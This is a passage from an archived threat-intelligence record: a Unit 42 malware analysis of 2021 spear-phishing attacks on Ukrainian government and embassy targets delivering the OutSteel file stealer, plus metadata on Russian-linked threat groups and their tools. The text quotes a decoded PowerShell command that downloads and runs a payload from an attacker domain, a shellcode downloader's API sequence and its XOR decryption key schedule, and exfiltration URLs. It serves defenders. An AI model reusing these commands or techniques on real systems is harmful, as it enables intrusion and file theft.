function.\r\nThe resulting executable (SHA256: df3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3)\r\neventually runs the OutSteel document stealer, which will exfiltrate files to the following URL:\r\nhxxp://194[.]147.142.232/upld/\r\nJune 2021 Attacks\r\nIn June 2021, we observed this threat group targeting another Ukrainian government organization by sending a spear\r\nphishing email with a subject that translates to “Your arrest warrant” from Ukrainian. The content of this email, seen in\r\nFigure 27, includes urgent language suggesting that the recipient must read the attached report or they will be declared\r\n“wanted.” This law enforcement theme relates to the Feb. 1, 2022, attacks that used a supposed police report as part of social\r\nengineering.\r\nFigure 27. Spear phishing email sent to Ukrainian government organization in June 2021.\r\nThe attachment is not a report as the body of the email suggests. Rather, the Заява №487223-31.doc (880m5) .js file\r\nattached is a JavaScript file that is 1,029,786 bytes in size (the actors added a considerable amount of spaces between each\r\ncharacter of the JavaScript code). If the recipient opens the attachment, the following JavaScript will execute:\r\nFigure 28. Malicious JavaScript contained in attached file.\r\nThe JavaScript above will run an encoded PowerShell script that decodes to the following:\r\ninvOKe-WeBREqUEST -urI hxxp://150520212[.]space/000.cpl -oUtFILE $ENv:PuBLiC\\000.cpl; \u0026 $eNV:PUBlIc\\000.cpl\r\nThis PowerShell script will download and execute a Control Panel File (CPL) from 150520212[.]space, which it saves to a\r\nfile named 000.cpl (SHA256: b72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939). The 000.cpl is\r\na DLL whose functional code exists within the exported function CPlApplet. The functional code uses several consecutive\r\njumps in an attempt to make code analysis more difficult. Despite these jumps, the functional code starts with a decryption\r\nstub, which will XOR each QWORD in the ciphertext using a key that starts as 0x29050D91. However, in each iteration of\r\nthe decryption loop, the key is modified by multiplying it by 0x749507B5 and adding 0x29050D91.\r\nOnce the decryption stub has finished, the code jumps to the decrypted code, which is a shellcode-based downloader that\r\ncarries out the following activity:\r\n1. Loads kernel32 using LoadLibraryW\r\n2. Gets the address to ExpandEnvironmentStringsW using GetProcAddress\r\n3. Calls ExpandEnvironmentStringsA to expand the environment string for the path %PUBLIC%\\5653YQ5T3.exe\r\n4. Opens the %PUBLIC%\\5653YQ5T3.exe file using CreateFileW\r\n5. Loads WinHttp using LoadLibraryA\r\n6. Opens an HTTP session by calling WinHttpOpen\r\n7. Connects to remote server 150520212[.]space over port 80/TCP by calling WinHttpConnect\r\n8. Creates an HTTP GET request for /0404.exe using WinHttpOpenRequest\r\n9. Sends the request via WinHttpSendRequest\r\n10. Calls WinHttpReceiveResponse, WinHttpQueryDataAvailable and WinHttpReadData to get the HTTP response data\r\n11. Writes the response data to %PUBLIC%\\5653YQ5T3.exe by calling WriteFile\r\n12. Closes handle to %PUBLIC%\\5653YQ5T3.exe by calling CloseHandle\r\n13. Runs %PUBLIC%\\5653YQ5T3.exe by calling ShellExecuteW\r\n14. Finishes by calling ExitProcess\r\nThe file hosted at 150520212[.]space/0404.exe (SHA256:\r\ncb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1) is an OutSteel sample that gathers and\r\nexfiltrates files to http://45[.]146.164.37/upld/.\r\nJuly 2021 Targeting\r\nOn July 22, 2021, we observed a spear phishing attempt in which the threat group targeted a Western government entity in\r\nUkraine. The actors sent the email to an address publicly displayed on the embassy’s website with the subject RE: CV. The\r\nemail had a Word document attached to it with a filename structured as \u003cfirst name\u003e_\u003clast name\u003e_CV.doc, where the\r\nname was that of a well-known journalist in Ukraine. Figure 29 shows the contents of the attached document as it would display in\r\na native Ukrainian installation of Windows.\r\nFigure 29. Contents of delivery document used in July 2021 attacks on an embassy in Kyiv.\r\nThe content of the document is meant to resemble a resume of the journalist. However, the garbled text suggests an encoding\r\nissue that the Ukrainian version of Windows could not display. The image is a stock photo available at several websites [1]\r\n[2][3], which does not appear to be a picture of the actual journalist. The garbled text is likely intentional as an attempt to\r\ntrick the user into clicking the “Enable Editing” button, which would ultimately run the macro embedded in the document.\r\nThe macro that will run if the user clicks the “Enable Editing” button, seen in Figure 30, creates a batch script called\r\nmeancell.bat that executes a PowerShell command that will use the Start-BitsTransfer cmdlet to download a payload from\r\nhxxp://1833[.]site/kpd1974.exe. It then saves the payload as everylisten.exe and executes it. Figure 30 shows the contents of the macro\r\nfound in this delivery document.\r\nFigure 30. Contents of macro in delivery document.\r\nThe kpd1974.exe file (SHA256: b8ce958f56087c6cd55fa2131a1cd3256063e7c73adf36af313054b0f17b7b43) downloaded\r\nand executed by the macro ultimately runs a variant of the OutSteel document harvesting tool that exfiltrates files to\r\nhxxp://45.146.165[.]91:8080/upld/. We found two additional delivery documents that shared a similar macro and hosted the\r\npayload on the 1833[.]site, as seen in Table 5. One of the filenames of these two related documents suggests that the threat\r\ngroup continued to use the fake resume theme.\r\nFirst Seen | Filename | Download URL\r\n7/23/2021 | Довiдка (22-7-2021).doc | hxxp://1833[.]site/gp00973.exe\r\n7/23/2021 | CV_RUSLANA.doc | hxxp://1833[.]site/rsm1975.exe\r\nTable 5. Related delivery documents used in the July attack.\r\nSource: https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/"
	],
	"report_names": [
		"ukraine-targeted-outsteel-saintbot"
	],
	"threat_actors": [
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434395,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.pdf",
		"text": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.txt",
		"img": "https://archive.orkl.eu/2dcf8a821046d08371dfd07bf2812c8c681d6b68.jpg"
	}
}